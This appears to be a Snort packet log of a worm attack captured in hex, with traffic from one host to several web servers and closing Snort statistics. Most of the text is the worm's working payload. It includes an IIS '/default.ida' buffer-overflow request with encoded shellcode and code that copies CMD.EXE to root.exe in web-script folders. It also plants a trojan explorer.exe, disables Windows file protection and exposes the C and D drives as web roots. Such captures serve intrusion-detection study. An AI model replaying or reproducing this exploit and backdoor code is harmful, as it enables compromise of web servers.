04 00 00 F7 D0 0F AF C7 ..,............. 89 46 34 8D 45 88 50 6A 00 FF 75 08 E8 05 00 00 .F4.E.Pj..u..... 00 E9 01 FF FF FF 6A 00 6A 00 FF 55 F0 50 FF 55 ......j.j..U.P.U D0 4F 75 D2 E8 3B 05 00 00 69 BD 54 FE FF FF 00 .Ou..;...i.T.... 5C 26 05 81 C7 00 5C 26 05 57 FF 55 E8 6A 00 6A \&....\&.W.U.j.j 16 FF 55 8C 6A FF FF 55 E8 EB F9 8B 46 34 29 45 ..U.j..U....F4)E 84 6A 64 FF 55 E8 8D 85 3C FE FF FF 50 FF 55 C0 .jd.U...<...P.U. 0F B7 85 3C FE FF FF 3D D2 07 00 00 73 CF 0F B7 ...<...=....s... 85 3E FE FF FF 83 F8 0A 73 C3 66 C7 85 70 FF FF .>......s.f..p.. FF 02 00 66 C7 85 72 FF FF FF 00 50 E8 64 04 00 ...f..r....P.d.. 00 89 9D 74 FF FF FF 6A 00 6A 01 6A 02 FF 55 B8 ...t...j.j.j..U. 83 F8 FF 74 F2 89 45 80 6A 01 54 68 7E 66 04 80 ...t..E.j.Th~f.. FF 75 80 FF 55 A4 59 6A 10 8D 85 70 FF FF FF 50 .u..U.Yj...p...P FF 75 80 FF 55 B0 BB 01 00 00 00 0B C0 74 4B 33 .u..U........tK3 DB FF 55 94 3D 33 27 00 00 75 3F C7 85 68 FF FF ..U.=3'..u?..h.. FF 0A 00 00 00 C7 85 6C FF FF FF 00 00 00 00 C7 .......l........ 85 60 FF FF FF 01 00 00 00 8B 45 80 89 85 64 FF .`........E...d. FF FF 8D 85 68 FF FF FF 50 6A 00 8D 85 60 FF FF ....h...Pj...`.. 
FF 50 6A 00 6A 01 FF 55 A0 93 6A 00 54 68 7E 66 .Pj.j..U..j.Th~f 04 80 FF 75 80 FF 55 A4 59 83 FB 01 75 31 E8 00 ...u..U.Y...u1.. 00 00 00 58 2D D3 03 00 00 6A 00 68 EA 0E 00 00 ...X-....j.h.... 50 FF 75 80 FF 55 AC 3D EA 0E 00 00 75 11 6A 00 P.u..U.=....u.j. 6A 01 8D 85 5C FE FF FF 50 FF 75 80 FF 55 A8 FF j...\...P.u..U.. 75 80 FF 55 B4 E9 E7 FE FF FF BB 00 00 DF 77 81 u..U..........w. C3 00 00 01 00 81 FB 00 00 00 78 75 05 BB 00 00 ..........xu.... F0 BF 60 E8 0E 00 00 00 8B 64 24 08 64 67 8F 06 ..`......d$.dg.. 00 00 58 61 EB D9 64 67 FF 36 00 00 64 67 89 26 ..Xa..dg.6..dg.& 00 00 66 81 3B 4D 5A 75 E3 8B 4B 3C 81 3C 0B 50 ..f.;MZu..K<.<.P 45 00 00 75 D7 8B 54 0B 78 03 D3 8B 42 0C 81 3C E..u..T.x...B..< 03 4B 45 52 4E 75 C5 81 7C 03 04 45 4C 33 32 75 .KERNu..|..EL32u BB 33 C9 49 8B 72 20 03 F3 FC 41 AD 81 3C 03 47 .3.I.r ...A..<.G 65 74 50 75 F5 81 7C 03 04 72 6F 63 41 75 EB 03 etPu..|..rocAu.. 4A 10 49 D1 E1 03 4A 24 0F B7 0C 0B C1 E1 02 03 J.I...J$........ 4A 1C 8B 04 0B 03 C3 89 44 24 24 64 67 8F 06 00 J.......D$$dg... 00 58 61 C3 E8 51 FF FF FF 89 5D FC 89 45 F8 E8 .Xa..Q....]..E.. 0D 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 ....LoadLibraryA 00 FF 75 FC FF 55 F8 89 45 F4 E8 0D 00 00 00 43 ..u..U..E......C 72 65 61 74 65 54 68 72 65 61 64 00 FF 75 FC FF reateThread..u.. 55 F8 89 45 F0 E8 0D 00 00 00 47 65 74 54 69 63 U..E......GetTic 6B 43 6F 75 6E 74 00 FF 75 FC FF 55 F8 89 45 EC kCount..u..U..E. E8 06 00 00 00 53 6C 65 65 70 00 FF 75 FC FF 55 .....Sleep..u..U F8 89 45 E8 E8 17 00 00 00 47 65 74 53 79 73 74 ..E......GetSyst 65 6D 44 65 66 61 75 6C 74 4C 61 6E 67 49 44 00 emDefaultLangID. FF 75 FC FF 55 F8 89 45 E4 E8 14 00 00 00 47 65 .u..U..E......Ge 74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79 tSystemDirectory 41 00 FF 75 FC FF 55 F8 89 45 E0 E8 0A 00 00 00 A..u..U..E...... 43 6F 70 79 46 69 6C 65 41 00 FF 75 FC FF 55 F8 CopyFileA..u..U. 
89 45 DC E8 10 00 00 00 47 6C 6F 62 61 6C 46 69 .E......GlobalFi 6E 64 41 74 6F 6D 41 00 FF 75 FC FF 55 F8 89 45 ndAtomA..u..U..E D8 E8 0F 00 00 00 47 6C 6F 62 61 6C 41 64 64 41 ......GlobalAddA 74 6F 6D 41 tomA =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:55.393957 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x5EA 202.140.112.30:2955 -> 137.189.98.79:80 TCP TTL:122 TOS:0x0 ID:32732 IpLen:20 DgmLen:1500 DF ***A**** Seq: 0x8D2601B9 Ack: 0x16C763B Win: 0x2238 TcpLen: 20 00 FF 75 FC FF 55 F8 89 45 D4 E8 0C 00 00 00 43 ..u..U..E......C 6C 6F 73 65 48 61 6E 64 6C 65 00 FF 75 FC FF 55 loseHandle..u..U F8 89 45 D0 E8 08 00 00 00 5F 6C 63 72 65 61 74 ..E......_lcreat 00 FF 75 FC FF 55 F8 89 45 CC E8 08 00 00 00 5F ..u..U..E......_ 6C 77 72 69 74 65 00 FF 75 FC FF 55 F8 89 45 C8 lwrite..u..U..E. E8 08 00 00 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC ....._lclose..u. FF 55 F8 89 45 C4 E8 0E 00 00 00 47 65 74 53 79 .U..E......GetSy 73 74 65 6D 54 69 6D 65 00 FF 75 FC FF 55 F8 89 stemTime..u..U.. 45 C0 E8 0B 00 00 00 57 53 32 5F 33 32 2E 44 4C E......WS2_32.DL 4C 00 FF 55 F4 89 45 BC E8 07 00 00 00 73 6F 63 L..U..E......soc 6B 65 74 00 FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 ket..u..U..E.... 00 00 63 6C 6F 73 65 73 6F 63 6B 65 74 00 FF 75 ..closesocket..u BC FF 55 F8 89 45 B4 E8 0C 00 00 00 69 6F 63 74 ..U..E......ioct 6C 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 89 45 lsocket..u..U..E A4 E8 08 00 00 00 63 6F 6E 6E 65 63 74 00 FF 75 ......connect..u BC FF 55 F8 89 45 B0 E8 07 00 00 00 73 65 6C 65 ..U..E......sele 63 74 00 FF 75 BC FF 55 F8 89 45 A0 E8 05 00 00 ct..u..U..E..... 00 73 65 6E 64 00 FF 75 BC FF 55 F8 89 45 AC E8 .send..u..U..E.. 05 00 00 00 72 65 63 76 00 FF 75 BC FF 55 F8 89 ....recv..u..U.. 45 A8 E8 0C 00 00 00 67 65 74 68 6F 73 74 6E 61 E......gethostna 6D 65 00 FF 75 BC FF 55 F8 89 45 9C E8 0E 00 00 me..u..U..E..... 00 67 65 74 68 6F 73 74 62 79 6E 61 6D 65 00 FF .gethostbyname.. 
75 BC FF 55 F8 89 45 98 E8 10 00 00 00 57 53 41 u..U..E......WSA 47 65 74 4C 61 73 74 45 72 72 6F 72 00 FF 75 BC GetLastError..u. FF 55 F8 89 45 94 E8 0B 00 00 00 55 53 45 52 33 .U..E......USER3 32 2E 44 4C 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 2.DLL..U..E..... 00 45 78 69 74 57 69 6E 64 6F 77 73 45 78 00 FF .ExitWindowsEx.. 75 90 FF 55 F8 89 45 8C C3 8B 45 84 69 C0 05 84 u..U..E...E.i... 08 08 40 89 45 84 8D 84 04 78 56 34 12 F7 D8 C1 ..@.E....xV4.... C0 08 C3 E8 E1 FF FF FF 3C 00 74 F7 3C FF 74 F3 ........<.t.<.t. C3 E8 ED FF FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1 ................ E3 10 E8 DC FF FF FF 8A F8 E8 D5 FF FF FF 8A D8 ................ E8 B4 FF FF FF 83 E0 07 E8 20 00 00 00 FF FF FF ......... ...... FF FF FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF ................ FF 00 00 FF FF 00 00 FF FF 00 00 FF FF 59 8B 04 .............Y.. 81 23 D8 F7 D0 23 85 58 FE FF FF 0B D8 80 FB 7F .#...#.X........ 74 9F 80 FB E0 74 9A 3B 9D 58 FE FF FF 74 92 C3 t....t.;.X...t.. 68 04 01 00 00 8D 85 5C FE FF FF 50 FF 55 E0 8D h......\...P.U.. BC 05 5C FE FF FF E8 09 00 00 00 5C 43 4D 44 2E ..\........\CMD. 45 58 45 00 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 EXE.^.....cj.... 00 00 64 3A 5C 69 6E 65 74 70 75 62 5C 73 63 72 ..d:\inetpub\scr 69 70 74 73 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C ipts\root.exe... 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 $....\...P.U.j.. 2B 00 00 00 64 3A 5C 70 72 6F 67 72 61 7E 31 5C +...d:\progra~1\ 63 6F 6D 6D 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C common~1\system\ 4D 53 41 44 43 5C 72 6F 6F 74 2E 65 78 65 00 8B MSADC\root.exe.. 0C 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC E8 BA .$....\...P.U... 05 00 00 FC 4D 5A 50 00 02 00 00 00 04 00 0F 00 ....MZP......... FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A FC ............@... 00 00 01 FC FC FC FC FC FC 00 00 50 45 00 00 4C ...........PE..L 01 03 00 FD 2A 25 29 00 00 00 00 00 00 00 00 E0 ....*%)......... 00 8F 81 0B 01 02 19 00 04 00 00 00 08 00 00 00 ................ 
00 00 00 00 10 00 00 00 10 00 00 00 20 00 00 00 ............ ... 00 40 00 00 10 00 00 00 04 00 00 01 00 00 00 00 .@.............. 00 00 00 03 00 0A 00 00 00 00 00 00 40 00 00 00 ............@... 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 ................ 20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 ............... 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 0C ............0... 01 FC FC FC 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 ................ 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 .......... ..`.. 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 04 ........... .... 00 00 00 0C 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 40 00 00 C0 00 00 00 00 00 00 00 00 00 10 ..@............. 00 00 00 30 00 00 00 04 00 00 00 10 00 00 00 00 ...0............ 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 FC FC ..........@..... FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 68 04 01 00 00 68 ..........h....h D0 20 40 00 E8 61 01 00 00 8D B8 D0 20 40 00 BE . @..a...... @.. 00 20 40 00 A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8 . @.....j.h. @.. 4C 01 00 00 E8 0C 00 00 00 68 C0 27 09 00 E8 31 L........h.'...1 01 00 00 EB EF 68 D8 24 40 00 68 3F 00 0F 00 6A .....h.$@.h?...j 00 68 10 20 40 00 68 02 00 00 80 E8 32 01 00 00 .h. @.h.....2... 0B C0 75 26 6A 04 68 54 20 40 00 6A 04 6A 00 68 ..u&j.hT @.j.j.h 48 20 40 00 FF 35 D8 24 40 00 E8 0D 01 00 00 FF H @..5.$@....... 35 D8 24 40 00 E8 0E 01 00 00 68 D8 24 40 00 68 5.$@......h.$@.h 3F 00 0F 00 6A 00 68 58 20 40 00 68 02 00 00 80 ?...j.hX @.h.... E8 ED 00 00 00 0B C0 75 55 BD 9C 20 40 00 E8 4C .......uU.. @..L 00 00 00 BD A8 20 40 00 E8 42 00 00 00 6A 09 68 ..... @..B...j.h B8 20 40 00 6A 01 6A 00 68 B0 20 40 00 FF 35 D8 . 
@.j.j.h. @..5. 24 40 00 E8 B4 00 00 00 6A 09 68 C4 20 40 00 6A $@......j.h. @.j 01 6A 00 68 B4 20 40 00 FF 35 D8 24 40 00 E8 99 .j.h. @..5.$@... 00 00 00 FF 35 D8 24 40 00 E8 9A 00 00 00 C3 C7 ....5.$@........ 05 D0 24 40 00 00 04 00 00 68 D0 24 40 00 68 D0 ..$@.....h.$@.h. 20 40 00 68 D4 24 40 00 6A 00 55 FF 35 D8 24 40 @.h.$@.j.U.5.$@ 00 E8 60 00 00 00 0B C0 75 49 A1 D0 24 40 00 0B ..`.....uI..$@.. C0 74 40 BE D0 20 40 00 80 3E 00 74 36 46 66 81 .t@.. @..>.t6Ff. 7E FE 2C 2C 75 F2 C7 06 32 31 37 00 81 EE CC 20 ~.,,u...217.... 40 00 89 35 @..5 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:57.490513 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:3054 -> 137.189.98.184:80 TCP TTL:122 TOS:0x0 ID:32906 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8D77AE5A Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:57.844740 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3B8 202.140.112.30:2955 -> 137.189.98.79:80 TCP TTL:122 TOS:0x0 ID:32922 IpLen:20 DgmLen:938 DF ***AP*** Seq: 0x8D26076D Ack: 0x16C763B Win: 0x2238 TcpLen: 20 D0 24 40 00 FF 35 D0 24 40 00 68 D0 20 40 00 6A .$@..5.$@.h. @.j 01 6A 00 55 FF 35 D8 24 40 00 E8 19 00 00 00 C3 .j.U.5.$@....... FF 25 60 30 40 00 FF 25 64 30 40 00 FF 25 68 30 .%`0@..%d0@..%h0 40 00 FF 25 70 30 40 00 FF 25 74 30 40 00 FF 25 @..%p0@..%t0@..% 78 30 40 00 FF 25 7C 30 40 FC FC FC FC FC FC FC x0@..%|0@....... FC FC FC FC FC FC FC FC FC FC FC FC 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 5C 45 58 50 4C 4F 52 .........\EXPLOR 45 52 2E 45 58 45 00 00 00 53 4F 46 54 57 41 52 ER.EXE...SOFTWAR 45 5C 4D 69 63 72 6F 73 6F 66 74 5C 57 69 6E 64 E\Microsoft\Wind 6F 77 73 20 4E 54 5C 43 75 72 72 65 6E 74 56 65 ows NT\CurrentVe 72 73 69 6F 6E 5C 57 69 6E 6C 6F 67 6F 6E 00 00 rsion\Winlogon.. 00 53 46 43 44 69 73 61 62 6C 65 00 00 9D FF FF .SFCDisable..... 
FF 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 .SYSTEM\CurrentC 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 ontrolSet\Servic 65 73 5C 57 33 53 56 43 5C 50 61 72 61 6D 65 74 es\W3SVC\Paramet 65 72 73 5C 56 69 72 74 75 61 6C 20 52 6F 6F 74 ers\Virtual Root 73 00 00 00 00 2F 53 63 72 69 70 74 73 00 00 00 s..../Scripts... 00 2F 4D 53 41 44 43 00 00 2F 43 00 00 2F 44 00 ./MSADC../C../D. 00 63 3A 5C 2C 2C 32 31 37 00 00 00 00 64 3A 5C .c:\,,217....d:\ 2C 2C 32 31 37 FC FC FC FC FC FC FC FC FC FC FC ,,217........... FC FC FC FC FC FC FC FC FC FC FC FC FC FC 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 3C 30 00 00 00 00 00 00 00 00 00 00 84 30 ..<0...........0 00 00 60 30 00 00 4C 30 00 00 00 00 00 00 00 00 ..`0..L0........ 00 00 91 30 00 00 70 30 00 00 00 00 00 00 00 00 ...0..p0........ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9E 30 ...............0 00 00 A6 30 00 00 BE 30 00 00 00 00 00 00 C8 30 ...0...0.......0 00 00 DC 30 00 00 EE 30 00 00 FE 30 00 00 00 00 ...0...0...0.... 00 00 9E 30 00 00 A6 30 00 00 BE 30 00 00 00 00 ...0...0...0.... 00 00 C8 30 00 00 DC 30 00 00 EE 30 00 00 FE 30 ...0...0...0...0 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 ......KERNEL32.d 6C 6C 00 41 44 56 41 50 49 33 32 2E 64 6C 6C 00 ll.ADVAPI32.dll. 00 00 53 6C 65 65 70 00 00 00 47 65 74 57 69 6E ..Sleep...GetWin 64 6F 77 73 44 69 72 65 63 74 6F 72 79 41 00 00 dowsDirectoryA.. 00 00 57 69 6E 45 78 65 63 00 00 00 52 65 67 51 ..WinExec...RegQ 75 65 72 79 56 61 6C 75 65 45 78 41 00 00 00 00 ueryValueExA.... 52 65 67 53 65 74 56 61 6C 75 65 45 78 41 00 00 RegSetValueExA.. 00 00 52 65 67 4F 70 65 6E 4B 65 79 45 78 41 00 ..RegOpenKeyExA. 00 00 52 65 67 43 6C 6F 73 65 4B 65 79 FC FC FC ..RegCloseKey... FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ 
FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 5E BF B9 05 00 00 6A .........^.....j 07 E8 10 00 00 00 64 3A 5C 65 78 70 6C 6F 72 65 ......d:\explore 72 2E 65 78 65 00 8B 04 24 88 18 FF 55 CC 83 F8 r.exe...$...U... FF 74 4D 89 85 4C FE FF FF AC 8A F8 38 3E 75 27 .tM..L......8>u' 6A 20 E8 23 00 00 00 00 00 00 00 00 00 00 00 00 j .#............ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 6A 01 56 FF B5 4C FE FF FF .......j.V..L... FF 55 C8 46 4F 75 C5 FF B5 4C FE FF FF FF 55 C4 .U.FOu...L....U. FE C3 80 FB 64 0F 86 4C F9 FF FF C3 61 C9 C2 04 ....d..L....a... 00 90 .. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:58.073005 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:3322 -> 137.189.99.51:80 TCP TTL:122 TOS:0x0 ID:32947 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8E61C7A4 Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:58.261598 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C 202.140.112.30:2955 -> 137.189.98.79:80 TCP TTL:122 TOS:0x0 ID:32967 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x8D260AEF Ack: 0x16C763B Win: 0x2238 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:27:00.403138 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:3322 -> 137.189.99.51:80 TCP TTL:122 TOS:0x0 ID:33208 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8E61C7A4 Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 
09/17-22:27:01.829590 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x5EA 202.140.112.30:2955 -> 137.189.98.79:80 TCP TTL:122 TOS:0x0 ID:33325 IpLen:20 DgmLen:1500 DF ***A**** Seq: 0x8D25FC05 Ack: 0x16C763B Win: 0x2238 TcpLen: 20 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61 GET /default.ida 3F 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 ?XXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 X%u9090%u6858%uc 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090% 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30 u6858%ucbd3%u780 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 1%u9090%u6858%uc 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090% 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63 u9090%u8190%u00c 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35 3%u0003%u8b00%u5 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25 31b%u53ff%u0078% 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54 u0000%u00=a HTT 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74 P/1.0..Content-t 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 43 6F ype: text/xml.Co 6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 33 ntent-length: 33 37 39 20 0D 0A 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/17-22:27:03.510322 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
202.140.112.30:2955 -> 137.189.98.79:80 TCP TTL:122 TOS:0x0 ID:33455 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x8D260AEF  Ack: 0x16C7731  Win: 0x2143  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/17-22:27:03.510324 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
202.140.112.30:2955 -> 137.189.98.79:80 TCP TTL:122 TOS:0x0 ID:33456 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x8D260AEF  Ack: 0x0  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/17-22:27:05.443018 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E
202.140.112.30:3525 -> 137.189.99.120:80 TCP TTL:122 TOS:0x0 ID:33598 IpLen:20 DgmLen:48 DF
******S* Seq: 0x8F168823  Ack: 0x0  Win: 0x2238  TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/17-22:27:06.619717 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E
202.140.112.30:3322 -> 137.189.99.51:80 TCP TTL:122 TOS:0x0 ID:33729 IpLen:20 DgmLen:48 DF
******S* Seq: 0x8E61C7A4  Ack: 0x0  Win: 0x2238  TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/17-22:27:08.587065 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E
202.140.112.30:3525 -> 137.189.99.120:80 TCP TTL:122 TOS:0x0 ID:33874 IpLen:20 DgmLen:48 DF
******S* Seq: 0x8F168823  Ack: 0x0  Win: 0x2238  TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/17-22:27:17.200789 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E
202.140.112.30:3525 -> 137.189.99.120:80 TCP TTL:122 TOS:0x0 ID:34397 IpLen:20 DgmLen:48 DF
******S* Seq: 0x8F168823  Ack: 0x0  Win: 0x2238  TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

===============================================================================
Snort processed 57 packets.
Breakdown by protocol:                Action Stats:
    TCP: 57         (100.000%)         ALERTS: 0
    UDP: 0          (0.000%)           LOGGED: 0
   ICMP: 0          (0.000%)           PASSED: 0
    ARP: 0          (0.000%)
   IPv6: 0          (0.000%)
    IPX: 0          (0.000%)
  OTHER: 0          (0.000%)
===============================================================================
Fragmentation Stats:
Fragmented IP Packets: 0          (0.000%)
   Rebuilt IP Packets: 0
   Frag elements used: 0
Discarded(incomplete): 0
   Discarded(timeout): 0
===============================================================================
TCP Stream Reassembly Stats:
   TCP Packets Used: 0          (0.000%)
   Reconstructed Packets: 0          (0.000%)
   Streams Reconstructed: 0
===============================================================================